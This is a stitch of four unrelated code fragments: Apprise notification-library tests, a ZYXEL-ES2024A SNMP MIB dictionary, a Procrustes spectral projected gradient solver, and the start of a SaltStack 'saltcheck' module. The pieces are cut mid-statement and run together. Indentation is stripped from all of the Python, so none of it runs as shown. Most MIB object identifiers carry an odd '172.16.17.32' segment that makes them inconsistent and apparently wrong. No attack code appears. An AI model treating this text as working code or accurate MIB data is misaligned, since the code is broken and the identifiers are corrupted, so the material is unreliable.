# This is acceptable as long as we exist in the
# tokens table because that is truely what we map
# back to
assert key in entry['details']['tokens']
else:
# Throw the problem into an assert tag for
# debugging purposes... the mapping is not
# acceptable
assert key != alias_of
# alias_of always references back to tokens
assert \
alias_of in entry['details']['tokens'] or \
alias_of in entry['details']['args']
# Find a list directive in our tokens
t_match = entry['details']['tokens']\
.get(alias_of, {})\
.get('type', '').startswith('list')
a_match = entry['details']['args']\
.get(alias_of, {})\
.get('type', '').startswith('list')
if not (t_match or a_match):
# Ensure the only token we have is the alias_of
# hence record should look like as example):
# {
# 'token': {
# 'alias_of': 'apitoken',
# },
# }
#
# Or if it can represent more then one entry; in
# this case, one must define a name (to define
# grouping).
# {
# 'token': {
# 'name': 'Tokens',
# 'alias_of': ('apitoken', 'webtoken'),
# },
# }
if isinstance(arg['alias_of'], six.string_types):
assert len(entry['details'][section][key]) == 1
else: # is tuple,list, or set
assert len(entry['details'][section][key]) == 2
# Must have a name defined to define grouping
assert 'name' in entry['details'][section][key]
else:
# We're a list, we allow up to 2 variables
# Obviously we have the alias_of entry; that's why
# were at this part of the code. But we can
# additionally provide a 'delim' over-ride.
assert len(entry['details'][section][key]) <= 2
if len(entry['details'][section][key]) == 2:
# Verify that it is in fact the 'delim' tag
assert 'delim' in \
entry['details'][section][key]
# If we do have a delim value set, it must be
# of a list/set/tuple type
assert isinstance(
entry['details'][section][key]['delim'],
(tuple, set, list),
)
if six.PY2:
# inspect our object
# getargspec() is deprecated in Python v3
spec = inspect.getargspec(SCHEMA_MAP[protocols[0]].__init__)
function_args = \
(set(parse_list(spec.keywords)) - set(['kwargs'])) \
| (set(spec.args) - set(['self'])) | valid_kwargs
else:
# Python v3+ uses getfullargspec()
spec = inspect.getfullargspec(SCHEMA_MAP[protocols[0]].__init__)
function_args = \
(set(parse_list(spec.varkw)) - set(['kwargs'])) \
| (set(spec.args) - set(['self'])) | valid_kwargs
# Iterate over our map_to_entries and make sure that everything
# maps to a function argument
for arg in map_to_entries:
if arg not in function_args:
# This print statement just makes the error easier to
# troubleshoot
print('{}:// template/arg/func reference missing error.'
.format(protocols[0]))
assert arg in function_args
# Iterate over all of the function arguments and make sure that
# it maps back to a key
function_args -= valid_kwargs
for arg in function_args:
if arg not in map_to_entries:
# This print statement just makes the error easier to
# troubleshoot
print('{}:// template/func/arg reference missing error.'
.format(protocols[0]))
assert arg in map_to_entries
# Iterate over our map_to_aliases and make sure they were defined in
# either the as a token or arg
for arg in map_to_aliases:
assert arg in set(entry['details']['args'].keys()) \
| set(entry['details']['tokens'].keys())
# Template verification
assert 'templates' in entry['details']
assert isinstance(entry['details']['templates'], (set, tuple, list))
# Iterate over our templates and parse our arguments
for template in entry['details']['templates']:
# Ensure we've properly opened and closed all of our tokens
assert template.count('{') == template.count('}')
expected_tokens = template.count('}')
args = template_token_re.findall(template)
assert expected_tokens == len(args)
# Build a cross reference set of our current defined objects
defined_tokens = set()
for key, arg in entry['details']['tokens'].items():
defined_tokens.add(key)
if 'alias_of' in arg:
defined_tokens.add(arg['alias_of'])
# We want to make sure all of our defined tokens have been
# accounted for in at least one defined template
for arg in args:
assert arg in set(entry['details']['args'].keys()) \
| set(entry['details']['tokens'].keys())
# The reverse of the above; make sure that each entry defined
# in the template_tokens is accounted for in at least one of
# the defined templates
assert arg in defined_tokens
@pytest.mark.skipif(sys.version_info.major <= 2, reason="Requires Python 3.x+")
@mock.patch('requests.post')
@mock.patch('apprise.py3compat.asyncio.notify', wraps=py3aio.notify)
def test_apprise_async_mode(mock_async_notify, mock_post, tmpdir):
"""
API: Apprise() async_mode tests
"""
mock_post.return_value.status_code = requests.codes.ok
# Define some servers
servers = [
'xml://localhost',
'json://localhost',
]
# Default Async Mode is to be enabled
asset = AppriseAsset()
assert asset.async_mode is True
# Load our asset
a = Apprise(asset=asset)
# add our servers
a.add(servers=servers)
# 2 servers loaded
assert len(a) == 2
# Our servers should carry this flag
for server in a:
assert server.asset.async_mode is True
# Send Notifications Asyncronously
assert a.notify("async") is True
# Verify our async code got executed
assert mock_async_notify.call_count == 1
mock_async_notify.reset_mock()
# Provide an over-ride now
asset = AppriseAsset(async_mode=False)
assert asset.async_mode is False
# Load our asset
a = | |
"ipSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11",
}, # node
"dnsIpAddress" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultMgmtIpSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.2",
}, # node
"defaultMgmtIpType" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.2.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"dhcp_client" : {
"nodetype" : "namednumber",
"number" : "0"
},
"static_ip" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultMgmtVid" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.2.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultMgmtStaticIp" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.2.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultMgmtStaticSubnetMask" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.2.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultMgmtStaticGateway" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.2.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"maxNumOfMgmtIp" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"mgmtIpTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6",
"status" : "current",
"description" :
"""""",
}, # table
"mgmtIpEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1",
"create" : "true",
"status" : "current",
"linkage" : [
"mgmtEntryIp",
"mgmtEntryVid",
],
"description" :
"""An entry in mgmtIpTable.""",
}, # row
"mgmtEntryIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mgmtEntrySubnetMask" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mgmtEntryGateway" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mgmtEntryVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"mgmtEntryManageable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mgmtEntryRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.11.6.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"filterSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12",
}, # node
"filterTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12.1",
"status" : "current",
"description" :
"""""",
}, # table
"filterEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12.1.1",
"create" : "true",
"status" : "current",
"linkage" : [
"filterMacAddr",
"filterVid",
],
"description" :
"""An entry in filterTable.""",
}, # row
"filterName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"filterMacAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"filterVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"filterRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.12.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mirrorSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13",
}, # node
"mirrorState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorMonitorPort" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorIngActionState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"all" : {
"nodetype" : "namednumber",
"number" : "0"
},
"destination_mac" : {
"nodetype" : "namednumber",
"number" : "1"
},
"source_mac" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorIngMacAddr" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorEgrActionState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"all" : {
"nodetype" : "namednumber",
"number" : "0"
},
"destination_mac" : {
"nodetype" : "namednumber",
"number" : "1"
},
"source_mac" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorEgrMacAddr" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.7",
"status" : "current",
"description" :
"""""",
}, # table
"mirrorEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.7.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in mirrorTable.""",
}, # row
"mirrorMirroredState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.16.13.7.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mirrorDirection" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.13.7.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"ingress" : {
"nodetype" : "namednumber",
"number" : "0"
},
"egress" : {
"nodetype" : "namednumber",
"number" : "1"
},
"both" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"aggrSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.14",
}, # node
"aggrState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-ES2024A-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.17.32.14.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"aggrSystemPriority" : {
"nodetype" : | |
fileobj, B1=None, blobopprod=0.0):
"""
Nonmonotone Spectral Projected Gradient solver for problems of the type
.. math::
\\min \\lVert AXC - B\\rVert_F^2 \\qquad s.t. X^TX = I
The method is described in references :cite:`FranBaza12` and
:cite:`FranBazaWebe17`, and we implement a few variations (including a
monotone version, a nonmonotone version using the strategy described in
:cite:`FranBaza12`, and a nonmonotone version using the strategy
described in :cite:`FranBazaWebe17`; check below for more details on how
to select these different algorithms).
This function is called by ``spectral_solver`` from both GKBSolver and
SPGSolver, with different parameters.
Input:
- ``problem``: ``ProcrustesProblem`` instance
- ``largedim``: ``int``
- ``smalldim``: ``int``
Since this function is called by ``spectral_solver``, it is possible
we are solving a smaller version of the original problem (when using
GKBSolver, for instance). Thus, ``lagedim`` and ``smalldim`` are the
dimensions of the current problem being solved by ``spectral_solver``.
- ``X``: ``ndarray(smalldim, p)``
Initial guess for the solution X of the Procrustes Problem being solved.
- ``A``: ``ndarray(largedim, smalldim)``
- ``B``: ``ndarray(largedim, q)``
- ``solvername``: str
Takes values ``spg`` or ``gkb`` (used to decide if ``full_results`` can
be reported).
- ``options``: ``dict``
Solver options. Keys available are:
- ``eta``: ``float``
parameter for the nonmonotone cost computation
- ``etavar``: ``bool``
decide if we are going to vary the parameter eta
for the nonmonotone cost computation
- ``maxiter``: ``int``
Maximum number of iterations allowed
- ``strategy``: ``str``
``monot`` (Monotone strategy), ``bazfr`` (Nonmonotone strategy
described in :cite:`FranBaza12`) or ``newfw`` (Nonmonotone
strategy described in :cite:`FranBazaWebe17`)
- ``verbose``: ``int``
Can take values in (0,1,2,3)
- ``gtol``: ``float``
Tolerance for convergence.
- ``bloboptest``: (*default*: ``False``)
boolean option to test the computation of a new residual at lower
GKB levels to decide if we are going to iterate at this level or
give up and add a new block to the bidiagonalization.
- ``polar``: (*default*: ``None``)
option to decide if we are going to compute the solution of the
GKB subproblem via an SVD decomposition or via iterative methods
to compute the polar decomposition.
Can take values ``ns`` or ``None``.
Output:
- ``exitcode``: ``int``
0 (success) or 1 (failure)
- ``f``: ``float``
Value of the objective function at final iterate
- ``X``: ``ndarray(smalldim, p)``
Approximate solution (final iterate)
- ``normg``: ``float``
Criticality measure at final iterate
- ``outer``: ``int``
Final number of outer iterations performed.
"""
# Setup
# A(largedim, smalldim)
# B(largedim, q)
# problem.C(p, q)
# X(smalldim, p)
m, n, p, q = problem.sizes # original sizes, not reduced
# chi determines by which factor is rho increased at each
# unsuccessful iteration
chi = 5.0 # juliano
# cost = [None]*(options["maxiter"]+1)
cost = []
# "total_fun" and "total_grad" store the criticality info
# for each iteration
if options["full_results"] and solvername == "spg":
problem.stats["total_fun"] = []
problem.stats["total_grad"] = []
# Barzilai-Borwein parameter
sigma_min = 1.0e-10
# Sufficient decrease parameter for trust region
# (trratio must be larger than beta1)
beta1 = 1.0e-4 # beta1 = 1.0e-10, beta1 = 0.5
# memory is the nonmonotone parameter, used to determine how many
# iterations will be used in the BAZFR strategy to compare the current
# objective function
# with past values.
if options["strategy"] == "monot":
memory = 1
else:
memory = 10
# Lu approximates the Lipschitz constant for the gradient of f
Lu = 2.0*sp.norm(np.dot(problem.C, problem.C.T), 'fro')*sp.norm(np.dot(A.T, A), 'fro')
# TODO check line below
if options["precond"] is not None:
Lu = options["precond"]*Lu
if options["verbose"] > 2:
print("\n Lu = {}".format(Lu), file=fileobj)
# R is the residual, norm(R,fro) is the cost.
R, residual = compute_residual(A, B, problem.C, X, options["precond"])
cost.append(residual)
# problem.stats["fev"] = problem.stats["fev"] + 1
problem.stats["fev"] = problem.stats["fev"] + (largedim/m)
quot = None
if options["strategy"] == "newfw":
if options["etavar"]:
eta = 0.9
else:
eta = options["eta"]
quot = 1.0
f = cost[0]
# Here, normg is the infinity norm of the "Projected Gradient"
normg, normgrad, grad = optimality(A, problem.C, R, X, options["precond"])
problem.stats["gradient"] = problem.stats["gradient"] + 1
if options["full_results"] and solvername == "spg":
problem.stats["total_fun"].append(f)
problem.stats["total_grad"].append(normg)
if options["verbose"] > 1:
print("\n OUTER ITERATION 0:\n", file=fileobj)
print(" f = {}".format(f), file=fileobj)
print(" normg = {}".format(normg), file=fileobj)
elif options["verbose"] == 1:
print(" nbiter f cost normg",
file=fileobj)
print("===========================================================",
file=fileobj)
print(" {0:>4} {1:>16.4e} {2:>16.4e} {3:>16.4e}".
format(0, f, f, normg), file=fileobj)
# problem.stats["nbiter"] = 0
outer = 0
# If flag_while, then continue cycling.
flag_while = True
flag_inner = True
ftrial = 0.0
Xold = X.copy()
oldRes = 0.0
Xtrial = None
Rtrial = None
while (normg > options["gtol"]
and flag_while
and outer < options["maxiter"]):
# Computation of the trust-region step parameters
if outer == 0:
sigma_bb = 0.5
else:
step = np.copy(X - Xold)
AstepC = np.dot(A, np.dot(step, problem.C))
sigma_bb = (sp.norm(AstepC, 'fro')**2)/(sp.norm(step, 'fro')**2)
# sigma_bb is the Barzilai-Borwein parameter.
sigma = max(sigma_min, sigma_bb)
trratio = beta1/2.0
# rho is the regularization parameter for the quadratic model
rho = sigma
if options["verbose"] > 2:
print(" sigma = rho = {}".format(sigma), file=fileobj)
nbinnerit = 0
W = np.zeros(X.shape)
# Inner iteration
# =============================================================
while flag_inner and trratio < beta1:
if options["verbose"] > 2:
print("\n INNER ITERATION {}:".format(nbinnerit),
file=fileobj)
print(" f = {}".format(cost[outer]), file=fileobj)
print(" normg = {}".format(normg), file=fileobj)
# Solving the subproblem: Xtrial, the solution to the subproblem,
# is defined as
# Xtrial = U*V' = UW*VWT
# where
# [U,S,V] = svd(W,0)
# where the above line is the "economy size" svd decomposition
# of W, defined as
W = np.copy(X - (1.0/(rho + sigma))*grad)
if options["polar"] == "ns":
Xtrial = polardecomp(W, options)
else:
# If X is m-by-n with m > n, then svd(X,0) computes only the
# first n columns of U and S is (n,n)
UW, SW, VWT = sp.svd(W, full_matrices=False)
# UW, SW, VWT = sp.svd(W)
# W(smalldim,p)
# UW(smalldim,min(smalldim,p))
# VWT(min(smalldim,p),p)
Xtrial = np.dot(UW, VWT)
problem.stats["svd"] = problem.stats["svd"] + 1
# Computing constraint violation to see if the subproblem
# solution has been satisfactorily solved
constraintviolation = np.abs(sp.norm(np.dot(Xtrial.T, Xtrial),
np.inf) - 1.0)
if constraintviolation >= 1.0e-5:
msg = _status_message['infeasible']
raise Exception("Warning: constraint violation = {}"
.format(constraintviolation))
Rtrial, ftrial = compute_residual(A, B, problem.C, Xtrial,
options["precond"])
# problem.stats["fev"] = problem.stats["fev"]+1
problem.stats["fev"] = problem.stats["fev"] + (largedim/m)
if options["verbose"] > 2:
print(" ftrial = {}".format(ftrial), file=fileobj)
ared = f - ftrial
pred = - np.trace(np.dot(grad.T, (Xtrial-X))
- (sigma/2.0)*sp.norm(Xtrial-X, 'fro')**2)
if np.abs(pred) < 1.0e-15:
msg = _status_message['smallpred']
print('Warning: ' + msg, file=fileobj)
trratio = 0.0
# flag_while = False
else:
trratio = ared/pred
if pred < 0:
msg = _status_message['negativepred']
print('Warning: ' + msg, file=fileobj)
# flag_while = False
# trratio = 0.0
if options["verbose"] > 2:
print(" ared = {}".format(ared), file=fileobj)
print(" pred = {}".format(pred), file=fileobj)
print(" trratio = {}".format(trratio),
file=fileobj)
if trratio > beta1:
flag_inner = False
if options["verbose"] > 2:
print("\n INNER ITERATION FINISHED: success",
file=fileobj)
print(" trratio = {}".format(trratio),
file=fileobj)
print(" beta1 = {}".format(beta1),
file=fileobj)
# Below is equation (15) from (<NAME>, 2012)
if flag_inner and flag_while:
rho = chi*rho
if rho > Lu:
if options["verbose"] > 1:
print(" WARNING: Using Lu "
" parameter = {} to ensure sufficient decrease "
" (inner {} and outer = {})"
.format(Lu, nbinnerit, outer), file=fileobj)
options["verbose"] = 3
sigma = Lu
if options["verbose"] > 2:
print(" rho = {}".format(rho), file=fileobj)
print(" sigma = {}"
.format(sigma), file=fileobj)
nbinnerit = nbinnerit + 1
if nbinnerit >= options["maxiter"]:
msg = _status_message['maxiter']
print('Warning: ' + msg + '(inner loop)', file=fileobj)
trratio = 1.0 # just to leave the while
# end while innerit ================================================
Xold = X.copy()
X = Xtrial.copy()
R = Rtrial.copy()
cost.append(ftrial)
# TODO: fix this (refactor?)
# Compute cost
if options["strategy"] == "MONOT":
f = cost[outer+1]
elif options["strategy"] == "BAZFR":
if outer < memory:
f = max(cost)
else:
f = max(cost[outer+1-memory:outer+1])
else:
# newfw
qold = quot
quot = eta*qold + 1.0
f = (eta*qold*f+ftrial)/quot
if options["etavar"]:
eta = max(0.75*eta, 0.0) # starting from eta | |
<reponame>dvogt/salt-check
# -*- coding: utf-8 -*-
'''
A module for testing the logic of states and highstates
Saltcheck provides unittest like functionality requiring only the knowledge of salt module execution and yaml.
In order to run state and highstate saltcheck tests a sub-folder of a state must be creaed and named "saltcheck-tests".
Tests for a state should be created in files ending in *.tst and placed in the saltcheck-tests folder.
Multiple tests can be created in a file.
Multiple *.tst files can be created in the saltcheck-tests folder.
Salt rendering is supported in test files e.g. yaml + jinja.
The "id" of a test works in the same manner as in salt state files.
They should be unique and descriptive.
Example file system layout:
/srv/salt/apache/
init.sls
config.sls
saltcheck-tests/
pkg_and_mods.tst
config.tst
Saltcheck Test Syntax:
Unique-ID:
module_and_function:
args:
kwargs:
assertion:
expected-return:
Example test 1:
echo-test-hello:
module_and_function: test.echo
args:
- "hello"
kwargs:
assertion: assertEqual
expected-return: 'hello'
:codeauthor: <NAME> <<EMAIL>>
:maturity: new
'''
from __future__ import absolute_import
import logging
import os
import time
from json import loads, dumps
import yaml
try:
import salt.utils
import salt.client
import salt.exceptions
from salt.utils.odict import OrderedDict
except ImportError:
pass
log = logging.getLogger(__name__)
__virtualname__ = 'saltcheck'
def __virtual__():
'''
Check dependencies - may be useful in future
'''
return __virtualname__
def update_master_cache():
'''
Updates the master cache onto the minion - transfers all salt-check-tests
Should be done one time before running tests, and if tests are updated
Can be automated by setting "auto_update_master_cache: True" in minion config
CLI Example:
salt '*' saltcheck.update_master_cache
'''
__salt__['cp.cache_master']()
return True
def run_test(**kwargs):
'''
Execute one saltcheck test and return result
:param keyword arg test:
CLI Example::
salt '*' saltcheck.run_test
test='{"module_and_function": "test.echo",
"assertion": "assertEqual",
"expected-return": "This works!",
"args":["This works!"] }'
'''
# salt converts the string to a dictionary auto-magically
scheck = SaltCheck()
test = kwargs.get('test', None)
if test and isinstance(test, dict):
return scheck.run_test(test)
else:
return "Test must be a dictionary"
def state_apply(state_name, **kwargs):
'''
Apply state.apply with given state and pillars to set up test data
:param str state_name: the name of a user defined state
:param dict kwargs: optional keyword arguments
CLI Example:
salt '*' saltcheck.state_apply postfix
'''
caller = salt.client.Caller()
if kwargs:
caller.cmd('state.apply', state_name, **kwargs)
else:
caller.cmd('state.apply', state_name)
return
def run_state_tests(state):
'''
Execute all tests for a salt state and return results
Nested states will also be tested
:param str state: the name of a user defined state
CLI Example::
salt '*' saltcheck.run_state_tests postfix
'''
scheck = SaltCheck()
paths = scheck.get_state_search_path_list()
stl = StateTestLoader(search_paths=paths)
results = OrderedDict()
sls_list = _get_state_sls(state)
for state_name in sls_list:
mypath = stl.convert_sls_to_path(state_name)
stl.add_test_files_for_sls(mypath)
stl.load_test_suite()
results_dict = OrderedDict()
for key, value in stl.test_dict.items():
result = scheck.run_test(value)
results_dict[key] = result
results[state_name] = results_dict
return _generate_out_list(results)
def run_highstate_tests():
'''
Execute all tests for a salt highstate and return results
CLI Example::
salt '*' saltcheck.run_highstate_tests
'''
scheck = SaltCheck()
paths = scheck.get_state_search_path_list()
stl = StateTestLoader(search_paths=paths)
results = OrderedDict()
sls_list = _get_top_states()
all_states = []
for top_state in sls_list:
sls_list = _get_state_sls(top_state)
for state in sls_list:
if state not in all_states:
all_states.append(state)
for state_name in all_states:
mypath = stl.convert_sls_to_path(state_name)
stl.add_test_files_for_sls(mypath)
stl.load_test_suite()
results_dict = OrderedDict()
for key, value in stl.test_dict.items():
result = scheck.run_test(value)
results_dict[key] = result
results[state_name] = results_dict
return _generate_out_list(results)
def _generate_out_list(results):
''' generate test results output list '''
passed = 0
failed = 0
skipped = 0
missing_tests = 0
total_time = 0.0
for state in results:
if len(results[state].items()) == 0:
missing_tests = missing_tests + 1
else:
for dummy, val in results[state].items():
log.info("dummy={}, val={}".format(dummy, val))
if val['status'].startswith('Pass'):
passed = passed + 1
if val['status'].startswith('Fail'):
failed = failed + 1
if val['status'].startswith('Skip'):
skipped = skipped + 1
total_time = total_time + float(val['duration'])
out_list = []
for key, value in results.items():
out_list.append({key: value})
out_list.sort()
out_list.append({"TEST RESULTS": {'Execution Time': round(total_time, 4), 'Passed': passed, 'Failed': failed, 'Skipped': skipped, 'Missing Tests': missing_tests}})
return out_list
def _render_file(file_path):
'''call the salt utility to render a file'''
# salt-call slsutil.renderer /srv/salt/jinjatest/saltcheck-tests/test1.tst
rendered = __salt__['slsutil.renderer'](file_path)
log.info("rendered: {}".format(rendered))
return rendered
def _is_valid_module(module):
'''return a list of all modules available on minion'''
modules = __salt__['sys.list_modules']()
return bool(module in modules)
def _get_auto_update_cache_value():
'''return the config value of auto_update_master_cache'''
__salt__['config.get']('auto_update_master_cache')
return True
def _is_valid_function(module_name, function):
'''Determine if a function is valid for a module'''
try:
functions = __salt__['sys.list_functions'](module_name)
except salt.exceptions.SaltException:
functions = ["unable to look up functions"]
return "{0}.{1}".format(module_name, function) in functions
def _get_top_states():
''' equivalent to a salt cli: salt web state.show_top'''
alt_states = []
try:
returned = __salt__['state.show_top']()
for i in returned['base']:
alt_states.append(i)
except Exception:
raise
# log.info("top states: {}".format(alt_states))
return alt_states
def _get_state_sls(state):
''' equivalent to a salt cli: salt web state.show_low_sls STATE'''
sls_list_state = []
try:
returned = __salt__['state.show_low_sls'](state)
for i in returned:
if i['__sls__'] not in sls_list_state:
sls_list_state.append(i['__sls__'])
except Exception:
# raise
pass
return sls_list_state
def _refresh_saltcheck_tests_dir(dirpath):
''' equivalent to:
